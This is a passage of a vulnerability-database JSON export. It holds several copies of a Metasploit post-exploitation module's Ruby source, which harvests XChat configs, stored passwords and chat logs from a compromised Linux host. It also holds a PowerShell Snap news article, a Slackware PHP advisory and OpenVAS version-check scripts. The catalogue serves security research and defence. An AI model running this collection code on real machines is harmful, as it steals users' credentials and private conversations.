f,\n :data => buf\n }\n end\n\n return config\n end\n\n def run\n if action.nil?\n print_error(\"Please specify an action\")\n return\n end\n\n @peer = \"#{session.session_host}:#{session.session_port}\"\n\n user = whoami\n if user.blank?\n print_error(\"#{@peer} - Unable to get username, abort.\")\n return\n end\n\n base = \"/home/#{user}/.xchat2/\"\n\n configs = get_configs(base) if action.name =~ /ALL|CONFIGS/i\n chatlogs = get_chatlogs(base) if action.name =~ /ALL|CHATS/i\n\n save(:configs, configs) unless configs.empty?\n save(:chatlogs, chatlogs) unless chatlogs.empty?\n end\nend\n\n=begin\nLinux xchat path:\n/home/[username]/.xchat2/\n * /home/[username]/.xchat2/servlist_.conf\n * /home/[username]/.xchat2/xchat.conf\n * /home/[username]/.xchat2/xchatlogs/FreeNode-#aha.log\n=end\n", "references": [], "modified": "1976-01-01T00:00:00", "description": "This module will collect XChat's config files and chat logs from the victim's machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The CONFIGS option can be used to collect information such as channel settings, channel/server passwords, etc. The CHATS option will simply download all the .log files.", "enchantments": {"score": {"modified": "2017-12-31T06:01:29", "value": 3.6}}, "id": "MSF:POST/LINUX/GATHER/ENUM_XCHAT", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/post/linux/gather/enum_xchat.rb", "metasploitReliability": "Normal", "enchantments_done": [], "bulletinFamily": "exploit", "reporter": "Rapid7", "title": "Linux Gather XChat Enumeration", "viewCount": 0, "lastseen": "2017-12-31T06:01:29", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/linux/gather/enum_xchat.rb", "cvelist": [], "objectVersion": "1.4", "history": [], "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, "differentElements": ["modified", "published"], "lastseen": "2017-12-31T06:01:29"}, {"edition": 7, "bulletin": {"published": "2012-03-31T05:15:21", "type": "metasploit", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::File\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Linux Gather XChat Enumeration',\n 'Description' => %q{\n This module will collect XChat's config files and chat logs from the victim's\n machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The\n CONFIGS option can be used to collect information such as channel settings,\n channel/server passwords, etc. The CHATS option will simply download all the\n .log files.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['sinn3r'],\n 'Platform' => ['linux'],\n # linux meterpreter is too busted to support right now,\n # will come back and add support once it's more usable.\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Actions' =>\n [\n ['CONFIGS', { 'Description' => 'Collect XCHAT\\'s config files' } ],\n ['CHATS', { 'Description' => 'Collect chat logs with a pattern' } ],\n ['ALL', { 'Description' => 'Collect both the plists and chat logs'}]\n ],\n 'DefaultAction' => 'ALL'\n ))\n end\n\n def get_file(file)\n tries = 0\n print_status(\"#{@peer} - Downloading #{file}\")\n\n begin\n buf = read_file(file)\n buf = '' if buf =~ /No such file or directory/\n rescue ::Timeout::Error => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n rescue EOFError => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n end\n\n return buf\n end\n\n def whoami\n user = cmd_exec(\"/usr/bin/whoami\").chomp\n return user\n end\n\n def list_logs(base)\n list = cmd_exec(\"ls -l #{base}*.log\")\n\n return [] if list =~ /No such file or directory/\n files = list.scan(/\\d+\\x20\\w{3}\\x20\\d+\\x20\\d{2}\\:\\d{2}\\x20(.+)$/).flatten\n\n return files\n end\n\n def save(type, data)\n case type\n when :configs\n type = 'xchat.config'\n when :chatlogs\n type = 'xchat.chatlogs'\n end\n\n data.each do |d|\n fname = ::File.basename(d[:filename])\n p = store_loot(\n type,\n 'text/plain',\n session,\n d[:data],\n fname\n )\n\n print_good(\"#{@peer} - #{fname} saved as #{p}\")\n end\n end\n\n def get_chatlogs(base)\n base << \"xchatlogs/\"\n\n logs = []\n\n list_logs(base).each do |l|\n vprint_status(\"#{@peer} - Downloading: #{l}\")\n data = read_file(l)\n logs << {\n :filename => l,\n :data => data\n }\n end\n\n return logs\n end\n\n def get_configs(base)\n config = []\n files = ['servlist_.conf', 'xchat.conf']\n files.each do |f|\n vprint_status(\"#{@peer} - Downloading: #{base + f}\")\n buf = read_file(base + f)\n next if buf.blank?\n config << {\n :filename => f,\n :data => buf\n }\n end\n\n return config\n end\n\n def run\n if action.nil?\n print_error(\"Please specify an action\")\n return\n end\n\n @peer = \"#{session.session_host}:#{session.session_port}\"\n\n user = whoami\n if user.blank?\n print_error(\"#{@peer} - Unable to get username, abort.\")\n return\n end\n\n base = \"/home/#{user}/.xchat2/\"\n\n configs = get_configs(base) if action.name =~ /ALL|CONFIGS/i\n chatlogs = get_chatlogs(base) if action.name =~ /ALL|CHATS/i\n\n save(:configs, configs) unless configs.empty?\n save(:chatlogs, chatlogs) unless chatlogs.empty?\n end\nend\n\n=begin\nLinux xchat path:\n/home/[username]/.xchat2/\n * /home/[username]/.xchat2/servlist_.conf\n * /home/[username]/.xchat2/xchat.conf\n * /home/[username]/.xchat2/xchatlogs/FreeNode-#aha.log\n=end\n", "references": [], "modified": "2017-07-24T13:26:21", "description": "This module will collect XChat's config files and chat logs from the victim's machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The CONFIGS option can be used to collect information such as channel settings, channel/server passwords, etc. The CHATS option will simply download all the .log files.", "enchantments": {"score": {"modified": "2018-01-01T09:59:18", "value": 3.6}}, "id": "MSF:POST/LINUX/GATHER/ENUM_XCHAT", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/post/linux/gather/enum_xchat.rb", "metasploitReliability": "Normal", "enchantments_done": [], "bulletinFamily": "exploit", "reporter": "Rapid7", "title": "Linux Gather XChat Enumeration", "viewCount": 0, "lastseen": "2018-01-01T09:59:18", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/linux/gather/enum_xchat.rb", "cvelist": [], "objectVersion": "1.4", "history": [], "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, "differentElements": ["modified", "published"], "lastseen": "2018-01-01T09:59:18"}, {"edition": 8, "bulletin": {"published": "1976-01-01T00:00:00", "type": "metasploit", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::File\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Linux Gather XChat Enumeration',\n 'Description' => %q{\n This module will collect XChat's config files and chat logs from the victim's\n machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The\n CONFIGS option can be used to collect information such as channel settings,\n channel/server passwords, etc. The CHATS option will simply download all the\n .log files.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['sinn3r'],\n 'Platform' => ['linux'],\n # linux meterpreter is too busted to support right now,\n # will come back and add support once it's more usable.\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Actions' =>\n [\n ['CONFIGS', { 'Description' => 'Collect XCHAT\\'s config files' } ],\n ['CHATS', { 'Description' => 'Collect chat logs with a pattern' } ],\n ['ALL', { 'Description' => 'Collect both the plists and chat logs'}]\n ],\n 'DefaultAction' => 'ALL'\n ))\n end\n\n def get_file(file)\n tries = 0\n print_status(\"#{@peer} - Downloading #{file}\")\n\n begin\n buf = read_file(file)\n buf = '' if buf =~ /No such file or directory/\n rescue ::Timeout::Error => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n rescue EOFError => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n end\n\n return buf\n end\n\n def whoami\n user = cmd_exec(\"/usr/bin/whoami\").chomp\n return user\n end\n\n def list_logs(base)\n list = cmd_exec(\"ls -l #{base}*.log\")\n\n return [] if list =~ /No such file or directory/\n files = list.scan(/\\d+\\x20\\w{3}\\x20\\d+\\x20\\d{2}\\:\\d{2}\\x20(.+)$/).flatten\n\n return files\n end\n\n def save(type, data)\n case type\n when :configs\n type = 'xchat.config'\n when :chatlogs\n type = 'xchat.chatlogs'\n end\n\n data.each do |d|\n fname = ::File.basename(d[:filename])\n p = store_loot(\n type,\n 'text/plain',\n session,\n d[:data],\n fname\n )\n\n print_good(\"#{@peer} - #{fname} saved as #{p}\")\n end\n end\n\n def get_chatlogs(base)\n base << \"xchatlogs/\"\n\n logs = []\n\n list_logs(base).each do |l|\n vprint_status(\"#{@peer} - Downloading: #{l}\")\n data = read_file(l)\n logs << {\n :filename => l,\n :data => data\n }\n end\n\n return logs\n end\n\n def get_configs(base)\n config = []\n files = ['servlist_.conf', 'xchat.conf']\n files.each do |f|\n vprint_status(\"#{@peer} - Downloading: #{base + f}\")\n buf = read_file(base + f)\n next if buf.blank?\n config << {\n :filename => f,\n :data => buf\n }\n end\n\n return config\n end\n\n def run\n if action.nil?\n print_error(\"Please specify an action\")\n return\n end\n\n @peer = \"#{session.session_host}:#{session.session_port}\"\n\n user = whoami\n if user.blank?\n print_error(\"#{@peer} - Unable to get username, abort.\")\n return\n end\n\n base = \"/home/#{user}/.xchat2/\"\n\n configs = get_configs(base) if action.name =~ /ALL|CONFIGS/i\n chatlogs = get_chatlogs(base) if action.name =~ /ALL|CHATS/i\n\n save(:configs, configs) unless configs.empty?\n save(:chatlogs, chatlogs) unless chatlogs.empty?\n end\nend\n\n=begin\nLinux xchat path:\n/home/[username]/.xchat2/\n * /home/[username]/.xchat2/servlist_.conf\n * /home/[username]/.xchat2/xchat.conf\n * /home/[username]/.xchat2/xchatlogs/FreeNode-#aha.log\n=end\n", "references": [], "modified": "1976-01-01T00:00:00", "description": "This module will collect XChat's config files and chat logs from the victim's machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The CONFIGS option can be used to collect information such as channel settings, channel/server passwords, etc. The CHATS option will simply download all the .log files.", "enchantments": {"score": {"modified": "2018-01-20T02:16:54", "value": null}}, "id": "MSF:POST/LINUX/GATHER/ENUM_XCHAT", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/post/linux/gather/enum_xchat.rb", "metasploitReliability": "Normal", "enchantments_done": [], "bulletinFamily": "exploit", "reporter": "Rapid7", "title": "Linux Gather XChat Enumeration", "viewCount": 0, "lastseen": "2018-01-20T02:16:54", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/linux/gather/enum_xchat.rb", "cvelist": [], "objectVersion": "1.4", "history": [], "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, "differentElements": ["modified", "published"], "lastseen": "2018-01-20T02:16:54"}], "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}

{"result": {"thn": [{"lastseen": "2018-07-20T21:11:01", "_object_types": ["robots.models.base.Bulletin", "robots.models.thn.ThnBulletin"], "references": [], "description": "[](<https://1.bp.blogspot.com/-n6Pkkp3-JBQ/W1I0v4RLakI/AAAAAAAAxmQ/51ArjMeuZTsDJ5a7r0YrLB-YZrtEZDOMACLcBGAs/s728-e100/microsoft-powershell-core-linux-min.jpg>)\n\nMicrosoft's love for Linux continues\u2026 \n \nMicrosoft has released its command-line shell and scripting language PowerShell Core for Linux operating system as a Snap package, making it easier for Linux users to install Microsoft PowerShell on their system. \n \nYes, you heard me right. \n \nMicrosoft has made **PowerShell Core** available to the [Ubuntu Snap Store](<https://snapcraft.io/powershell-preview>) as a Snap application. \n \nPowerShell Core is a cross-platform version of Windows PowerShell that is already available for Windows, macOS, and Linux OS and has been designed for sysadmins who manage assets in hybrid clouds and heterogeneous environments. \n\n\n \n**Snap** is a universal Linux packaging system, built by Canonical for the Ubuntu operating system, which makes an application compatible for all major Linux distributions without requiring any modification. \n \nA Snap package is basically an application compressed together with its dependencies and also includes instructions on how to run and interact with other software on various Linux systems. \n\n\n> \"Snaps are great because they provide a single package format that works across many Linux distributions, much like how PowerShell acts as a single automation platform across operating systems,\" [explains](<https://snapcraft.io/blog/powershell-launches-as-a-snap>) Joey Aiello, Program Manager of PowerShell at Microsoft.\n\n> \"We hope our users enjoy the simplified installation and update experience of Snaps as much as we do.\"\n\n> \"PowerShell Core from Microsoft is now available for Linux as a Snap. Built on the .NET Framework, PowerShell is an open source task-based command-line shell and scripting language with the goal of being the ubiquitous language for managing hybrid cloud assets,\" says Canonical.\n\n> \"It is designed specifically for system administrators and power-users to rapidly automate the administration of multiple operating systems and the processes related to the applications that run on those operating systems.\"\n\n \n\n\n## How to Install PowerShell Core on Linux\n\n \nTo install Microsoft PowerShell Core as a snap package on a Linux-based OS, you first need to install snapd and then run the following command. \n\n\n> snap install powershell --classic \n\nOnce installed, open a terminal and run the command pwsh. \n \nAlternatively, you can directly head on to this [web page](<https://snapcraft.io/powershell>), and install PowerShell Core snap app on your system. \n\n\n \nIf you want to try out beta software, you also can install the official preview/beta version of PowerShell found here, or run the below command from the terminal. \n \n\n\n> snap install powershell-preview --classic\n\n \nThe arrival of PowerShell Core on the Snap store is definitely a big deal. \n \nEarlier this year, Microsoft even released a [Skype Snap app](<https://snapcraft.io/skype>). All these are a continued sign of Microsoft\u2019s support for open source community. \n \nAnd one should not forget, [Microsoft now owns GitHub](<https://thehackernews.com/2018/06/microsoft-acquires-github.html>)! \n\n\nHave something to say about this article? Comment below or share it with us on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter](<https://twitter.com/thehackersnews>) or our [LinkedIn Group](<https://www.linkedin.com/company/the-hacker-news/>).\n", "reporter": "The Hacker News", "published": "2018-07-20T19:27:00", "type": "thn", "title": "Microsoft Releases PowerShell Core for Linux as a Snap Package", "enchantments": {"score": {"modified": "2018-07-20T21:11:01", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "info", "cvelist": [], "_object_type": "robots.models.thn.ThnBulletin", "modified": "2018-07-20T19:27:46", "id": "THN:CCFD967EEC07D85067D0977D235757E8", "href": "https://thehackernews.com/2018/07/powershell-core-linux-snap.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "slackware": [{"lastseen": "2018-07-21T05:42:12", "references": [], "affectedPackage": [{"OS": "Slackware", "OSVersion": "14.0", "packageVersion": "5.6.37", "arch": "i486", "packageFilename": "php-5.6.37-i486-1_slack14.0.txz", "packageName": "php", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.1", "packageVersion": "5.6.37", "arch": "i486", "packageFilename": "php-5.6.37-i486-1_slack14.1.txz", "packageName": "php", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.2", "packageVersion": "5.6.37", "arch": "i586", "packageFilename": "php-5.6.37-i586-1_slack14.2.txz", "packageName": "php", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.1", "packageVersion": "5.6.37", "arch": "x86_64", "packageFilename": "php-5.6.37-x86_64-1_slack14.1.txz", "packageName": "php", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.0", "packageVersion": "5.6.37", "arch": "x86_64", "packageFilename": "php-5.6.37-x86_64-1_slack14.0.txz", "packageName": "php", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.2", "packageVersion": "5.6.37", "arch": "x86_64", "packageFilename": "php-5.6.37-x86_64-1_slack14.2.txz", "packageName": "php", "operator": "lt"}], "description": "New php packages are available for Slackware 14.0, 14.1, 14.2, and -current to\nfix security issues.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/php-5.6.37-i586-1_slack14.2.txz: Upgraded.\n Several security bugs have been fixed in this release, including:\n Int Overflow lead to Heap OverFlow in exif_thumbnail_extract of exif.c\n heap-buffer-overflow (READ of size 48) while reading exif data\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the &quot;Get Slack&quot; section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/php-5.6.37-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/php-5.6.37-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/php-5.6.37-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/php-5.6.37-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/php-5.6.37-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/php-5.6.37-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/php-7.2.8-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/php-7.2.8-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.0 package:\nf0e3dca0b127dc7e1d84d9ee368f5a10 php-5.6.37-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n12fb8e7be24a5042272d59a86f4c4f39 php-5.6.37-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\nf529dafb15dc467102f7ba52e77b1736 php-5.6.37-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\nc8540af3b6e614835e77245174010214 php-5.6.37-x86_64-1_slack14.1.txz\n\nSlackware 14.2 package:\n7c41dc5000dc56b16fc40f69692fdb32 php-5.6.37-i586-1_slack14.2.txz\n\nSlackware x86_64 14.2 package:\nb215c0f2ef06ce14b9cc02594e84113a php-5.6.37-x86_64-1_slack14.2.txz\n\nSlackware -current package:\nbbee40abac3a845239a930e524cf952d n/php-7.2.8-i586-1.txz\n\nSlackware x86_64 -current package:\ne66c46abaac39bd629e7f6ce303a46b6 n/php-7.2.8-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg php-5.6.37-i586-1_slack14.2.txz\n\nThen, restart Apache httpd:\n > /etc/rc.d/rc.httpd stop\n > /etc/rc.d/rc.httpd start", "edition": 1, "reporter": "Slackware Linux Project", "published": "2018-07-20T16:16:01", "title": "php", "type": "slackware", "enchantments": {"score": {"modified": "2018-07-21T05:42:12", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": [], "modified": "2018-07-20T16:16:01", "id": "SSA-2018-201-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2018&m=slackware-security.421586", "cvss": {"score": 0.0, "vector": "NONE"}}], "openvas": [{"lastseen": "2018-07-20T19:42:15", "references": ["https://lists.debian.org/debian-lts-announce/2018/07/msg00022.html"], "pluginID": "1361412562310891430", "description": "CVE-2018-11439\nFix for a heap-based buffer over-read via a crafted audio file.", "edition": 1, "reporter": "Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net", "published": "2018-07-20T00:00:00", "title": "Debian LTS Advisory ([SECURITY] [DLA 1430-1] taglib security update)", "type": "openvas", "enchantments": {"score": {"modified": "2018-07-20T19:42:15", "vector": "NONE", "value": 6.8}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-11439"], "modified": "2018-07-20T00:00:00", "id": "OPENVAS:1361412562310891430", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891430", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: deb_dla_1430.nasl 10557 2018-07-20 13:48:28Z asteins $\n#\n# Auto-generated from advisory DLA 1430-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891430\");\n script_version(\"$Revision: 10557 $\");\n script_cve_id(\"CVE-2018-11439\");\n script_name(\"Debian LTS Advisory ([SECURITY] [DLA 1430-1] taglib security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-07-20 15:48:28 +0200 (Fri, 20 Jul 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-20 00:00:00 +0200 (Fri, 20 Jul 2018)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2018/07/msg00022.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\\.[0-9]+\");\n script_tag(name:\"affected\", value:\"taglib on Debian Linux\");\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these problems have been fixed in version\n1.9.1-2.1+deb8u1.\n\nWe recommend that you upgrade your taglib packages.\");\n script_tag(name:\"summary\", value:\"CVE-2018-11439\nFix for a heap-based buffer over-read via a crafted audio file.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libtag1-dev\", ver:\"1.9.1-2.1+deb8u1\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtag1-doc\", ver:\"1.9.1-2.1+deb8u1\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtag1-vanilla\", ver:\"1.9.1-2.1+deb8u1\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtag1c2a\", ver:\"1.9.1-2.1+deb8u1\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtagc0\", ver:\"1.9.1-2.1+deb8u1\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtagc0-dev\", ver:\"1.9.1-2.1+deb8u1\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-07-20T19:43:08", "references": ["2018-6abfa0012f", "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YCANPBQBD746IUDZBWMYW7HM77JRL3WG"], "pluginID": "1361412562310874834", "description": "Check the version of perl-Archive-Zip", "edition": 1, "reporter": "Copyright (C) 2018 Greenbone Networks GmbH", "published": "2018-07-20T00:00:00", "title": "Fedora Update for perl-Archive-Zip FEDORA-2018-6abfa0012f", "type": "openvas", "enchantments": {"score": {"modified": "2018-07-20T19:43:08", "vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10860"], "modified": "2018-07-20T00:00:00", "id": "OPENVAS:1361412562310874834", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874834", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_6abfa0012f_perl-Archive-Zip_fc28.nasl 10558 2018-07-20 14:08:23Z santu $\n#\n# Fedora Update for perl-Archive-Zip FEDORA-2018-6abfa0012f\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874834\");\n script_version(\"$Revision: 10558 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-07-20 16:08:23 +0200 (Fri, 20 Jul 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-20 06:07:05 +0200 (Fri, 20 Jul 2018)\");\n script_cve_id(\"CVE-2018-10860\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for perl-Archive-Zip FEDORA-2018-6abfa0012f\");\n script_tag(name:\"summary\", value:\"Check the version of perl-Archive-Zip\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present \non the target host.\");\n script_tag(name:\"insight\", value:\"The Archive::Zip module allows a Perl program \nto create, manipulate, read, and write Zip archive files. Zip archives can be created, \nor you can read from existing zip files. Once created, they can be written to files, \nstreams, or strings. Members can be added, removed, extracted, replaced, rearranged, \nand enumerated. They can also be renamed or have their dates, comments,\nor other attributes queried or modified. Their data can be compressed\nor uncompressed as needed. Members can be created from members in\nexisting Zip files, or from existing directories, files, or strings.\n\");\n script_tag(name:\"affected\", value:\"perl-Archive-Zip on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-6abfa0012f\");\n script_xref(name:\"URL\" , value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YCANPBQBD746IUDZBWMYW7HM77JRL3WG\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"perl-Archive-Zip\", rpm:\"perl-Archive-Zip~1.60~3.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-07-20T19:43:09", "references": ["2018-61dbd4a787", "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VUTKBGSXO6TYR6MTBCSU3R2ZU7Y6FNZU"], "pluginID": "1361412562310874831", "description": "Check the version of qutebrowser", "edition": 1, "reporter": "Copyright (C) 2018 Greenbone Networks GmbH", "published": "2018-07-20T00:00:00", "title": "Fedora Update for qutebrowser FEDORA-2018-61dbd4a787", "type": "openvas", "enchantments": {"score": {"modified": "2018-07-20T19:43:09", "vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10895"], "modified": "2018-07-20T00:00:00", "id": "OPENVAS:1361412562310874831", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874831", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_61dbd4a787_qutebrowser_fc28.nasl 10558 2018-07-20 14:08:23Z santu $\n#\n# Fedora Update for qutebrowser FEDORA-2018-61dbd4a787\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A 